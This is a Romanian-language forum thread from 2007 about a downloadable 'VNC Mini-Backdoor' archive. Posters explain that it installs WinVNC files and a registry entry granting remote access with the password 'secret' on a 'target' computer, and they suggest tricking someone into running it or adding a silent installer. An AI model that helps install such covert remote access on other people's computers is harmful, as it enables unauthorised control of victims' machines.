Ras Posted August 26, 2007 Report Posted August 26, 2007 Vedeti ca in arhiva este un fisier .txt, cititi ce scrie in el.Eu nu am inteles mai nimic... cum sa folosesc... daca intelegeti careva si testati sa imi explicati si mie daca vreti.Download: http://rapidshare.com/files/51381520/VNC_Mini-Backdoor.rar Quote
Limo11 Posted August 26, 2007 Report Posted August 26, 2007 Computerul tinta are nevoie de urmatoarele fisiere: omnithread_rt.dll , VNCHooks.dll , WinVNC.exe, precum si sa importe VNC_secret.reg in registri ceea ce va crea acces cu parola: secret Nu prea seamana a backdoor Este o metoda fainuta daca poti face pe cineva sa instaleze si sa execute acel fisier. Altfel daca ai acces la computerul unde vrei sa ai remote control nu ai nevoie sa importezi VNC_secret.reg ...iti pui ce parola vrei tu Quote
Pastilatu' Posted August 27, 2007 Report Posted August 27, 2007 un silent installer ar fi foarte bun Quote
PsYKid Posted August 28, 2007 Report Posted August 28, 2007 Degeaba il pui daca are : * internet security sau orice altceva care monitorizeaza registri Quote
Ras Posted August 28, 2007 Author Report Posted August 28, 2007 Computerul tinta are nevoie de urmatoarele fisiere: omnithread_rt.dll , VNCHooks.dll , WinVNC.exe, precum si sa importe VNC_secret.reg in registri ceea ce va crea acces cu parola: secret Nu prea seamana a backdoor Este o metoda fainuta daca poti face pe cineva sa instaleze si sa execute acel fisier. Altfel daca ai acces la computerul unde vrei sa ai remote control nu ai nevoie sa importezi VNC_secret.reg ...iti pui ce parola vrei tuMerci pt explicatie Quote
lafurat Posted December 13, 2007 Report Posted December 13, 2007 Man eu am avut un VNC ca numa bagai ipu si se conecta automat da mi lo sters antivirusul si nu il mai gasesc :cry:. Si poate cineva sa imi deie fisierele astea omnithread_rt.dll , VNCHooks.dll , WinVNC.exe, VNC_security.reg ca tot imi cere parola Quote
michee Posted December 14, 2007 Report Posted December 14, 2007 Ce face programul asta mai exact? Deci VNC-ul e ptr a controla un calculator la distanta....Asta ce face? e ceva reverse, din prada sa devii vanator sau cum? Quote
D4Rk M3sSIah Posted January 18, 2008 Report Posted January 18, 2008 Dupa cate stiam, VNC este un program de remote acees(desktop)! Te conectezi prin ip-ul celuilalt utilizator si iti apare o fereastra in care este desktop-ul partenerului si ii poti astfel comtrola pc-ul (controlezi mouse-ul, tastatura, etc). Nu cred ca scopul acestui program este "malefic", dimpotriva, eu cel putin l-am folosit sa poata sa imi configureze cineva cateceva prin pc si invers!Recomand: TeamViewer, este mai usor de folosit, nu trebuie "facut schimb" de ip-uri, ci programul iti da un ID din cateva cifre prin care pori accesa. Si nu trebuie sa deschizi sute de ferestre (gen: WinVNC, VNCconfig, VNCviewer), ci doar UNA!Have Fun! P.S. Dupa parerea mea nu este un backdoor! Quote
MaHaReT Posted January 18, 2008 Report Posted January 18, 2008 Man eu am avut un VNC ca numa bagai ipu si se conecta automat da mi lo sters antivirusul si nu il mai gasesc :cry:. Si poate cineva sa imi deie fisierele astea omnithread_rt.dll , VNCHooks.dll , WinVNC.exe, VNC_security.reg ca tot imi cere parolaDai un F3 [ mozilla ] cu "omnithread_rt.dll" aici si il gasesti : http://www.nodevice.com/dll/O/page5.htmlVNCHooks.dll il ai aici : http://www.dlldll.com/vnchooks.dll_download.html Google it ! p.s. ultimu nu l-am gasit plus restu nu am mai stat sa ma uit ! www.google.ro - foloseste-l cu incredere ! Quote